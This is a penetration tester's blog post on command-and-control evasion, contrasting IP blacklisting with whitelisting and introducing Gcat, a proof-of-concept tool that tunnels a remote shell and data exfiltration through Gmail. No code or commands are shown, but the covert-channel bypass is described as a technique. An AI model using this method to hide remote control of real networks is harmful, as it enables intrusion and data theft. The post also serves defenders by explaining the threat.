Benjamin Donnelly //
When simple bind shells don’t work, a reverse shell is the way to go. But what happens when computer network defense teams get wise and start deploying defenses against even these simple countermeasures?
The never ending game of cat and mouse that is computer network defense lends itself to a continual arms race between attacker and defender. The defenders up their game, completely removing a previous attack vector. The adversary counters by immediately finding a new way to escalate their game to new heights. The entire history of computer network operations is defined by this fact. One exemplary domain through which we can envision this effect and the subject of my blog entry is the escalation over C2 (command and control, data exfiltration, covert channels).
With lackadaisical firewall rules, remote code execution can quickly lead to the binding of a shell listening on the victim machine. Once the defense activates a simple default deny for incoming connections on all ports (other than those specifically excluded from the rule); a bind shell becomes nigh infeasible. Of course, the solution is not to find some ridiculous work around. The solution is to deploy a reverse shell which phones home to the attacker.
Now, there are a number of additional mitigatory steps that the defenders can take between the former and whitelisting. But that being said, whitelisting is what I would like to talk about. With internet blacklisting, it’s not unfair to say that even with a massive block-list. You will still be allowing traffic out to 99.99 percent of the internet.
I was once working on a test against a target with extensive and highly sensitive internet blacklisting. We were purposefully triggering the alarms as part of a command and control/data exfiltration test. Every time I would trigger an alarm, the jump box from which I was operating would be blacklisted (IP). This would at first glance appear to be a somewhat decent defense. Certainly it is better than the majority of internal networks I’ve encountered. Where literally nothing happens when an alarm is triggered (if there are any alarms at all). But the bypass for me could not have been simpler. Grabbing a new IP address for my jump box was nothing more than a minute long process. And just like that, I was back in the network.The problem with internet blacklisting, is that it is simply impossible to stop any sort of even slightly sophisticated adversary. I change my signature slightly, and re-attack. It is because of this fact, that internet whitelisting is the preferred recommendation for highly security conscious companies. With security whitelisting, you will end up blocking all but the explicitly allowed internet resources. Of course, the immediate issue with this that arises is a gigantic fear of the chill it will put on company productivity. If everything on the internet is blocked, how can anyone get any work done? The solution is simple. An alert IT team just takes requests for sites to be added to the whitelist on an ongoing basis. If one of your employees needs to get access to Youtube. He sends a quick request to the team. The IT team approves the request. And in less than a minute or two Youtube is available to all users. The difference here, is that it’s not possible for someone to just quickly permute their signature in order to avoid the black list. Whitelisting keeps the 99.99 percent of the internet out; and lets in everything that you keep eyes on. This is a far better solution. But as I’m sure you might imagine, it is not foolproof. Certainly, there is more than one way to bypass even well orchestrated implementations of internet whitelisting. For starters, a simple approval process might lead to malicious sites getting places on the list. Of course, in defense of the process. Even in this eventuality, it is far easier to remove a dangerous entry from a whitelist than it is to continually block a mutating adversary via blacklists.
My favorite bypass technique however is something far more low profile. As an attacker, if I want to command systems on or extract data from a target network all I need is a pipe through which I can send information in and out. Even with internet whitelisting, plenty of sites from the whitelist will still be readily capable of piping information through the network. Unfortunately for the defenders, these sites will likely be highly trusted, and allowed to communicate with company systems with very little oversight. All you need to do as an attacker is find a way to piggyback on an already trusted communication channel.
This is why I wrote the POC (proof of concept) Gcat. Just like Netcat, Gcat pipes raw data from a client to a server. It does also have the ability to drop into a command shell. The biggest difference being, while Netcat works over TCP/IP. Gcat works by piping its communications, encapsulated via Gmail. It literally emails in and out of the network. You might imagine that even on an exceptionally secure network, with top of the line whitelisting; Gmail is going to be one of the first services to be whitelisted. In terms of “threats”, Google is not at all something that should be blacklisted. Google is one of the web’s greatest portals to productivity. And unfortunately for us, most security teams just simply don’t think of this type of threat (piggybacking on legitimate services in order to bypass a whitelist).
Now there is certainly one saving grace. Not many adversaries actually make it to this level of sophistication. At least not in your general attack. Internet cyber crime is far more ready to play the part of a hungry predator, picking on only the weak and wounded. And ignoring the large, lucrative targets that look difficult. But statistical effects are no excuse when it comes to securing our nation’s infrastructure. We must be ready for any threat, not just the most typical.
And so I present for your consideration, Gcat. A proof of concept Netcat over Gmail.
This small POC has also been ported to powershell for ease of use on windows machines.
As well as updated and turned into something more than just a POC.